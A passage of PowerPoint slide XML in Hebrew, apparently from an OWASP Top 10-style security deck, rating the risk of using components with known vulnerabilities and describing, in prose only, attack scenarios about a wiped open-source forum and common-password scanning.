              <a:t> פגיעויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>ידועות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4078780074"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניצול: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אומנם קל לזהות חולשות שכבר נכתבו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וידועות לרבים, חולשות אחרות מחייבות השקעת מאמץ מוגבר על-מנת לפתח קוד מותאם אישית.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השכיחות של בעיה זו נפוצה מאוד.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>דפוסי פיתוח מרובי-רכיבים עשויים להוביל לכך שצוותי פיתוח אינם מסוגלים להבין אילו רכיבים בשימוש ביישום או בממשקי הפיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), שלא לומר לדאוג לעדכן</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אותם.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חלק מכלי הסריקה כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>retire.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> עשויים לסייע בזיהוי, אך קביעת רמת החשיפה מחייבת מאמץ נוסף.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מקצת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מהחולשות הידועות גורמות לנזק מועט, אולם חלק מאירועי הפריצה הגדולים עד כה התבססו על ניצול חולשות אבטחה ברכיבי מערכת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בהתאם לנכס עליו מנסים להגן, ייתכן שסיכון זה צריך להיות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתועדף</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ראשון.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7887970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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> פורום של פרוייקט קוד פתוח המופעל ע"י צוות קטן, נפרץ באמצעות חולשה בתוכנה. התוקפים הצליחו למחוק את כל קוד המקור הפנימי המכיל את הגרסה הבאה, וכן את כל תוכן הפורום.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אומנם ניתן לשחזר את קוד המקור, היעדר ניטור, תיעוד והתראות הוביל לפריצה חמורה הרבה יותר. תוכנת הפורום של הפרוייקט אינה פעילה יותר כתוצאה מהאירוע.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> תוקפים מבצעים סריקה אחר משתמשים בעלי סיסמא נפוצה. התוקפים עשויים להשתלט על כל החשבונות בעלי אותה סיסמא נפוצה. עבור ייתר המשתמשים, הסריקה משאירה מאחוריה אירוע הזדהות כושל בודד. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
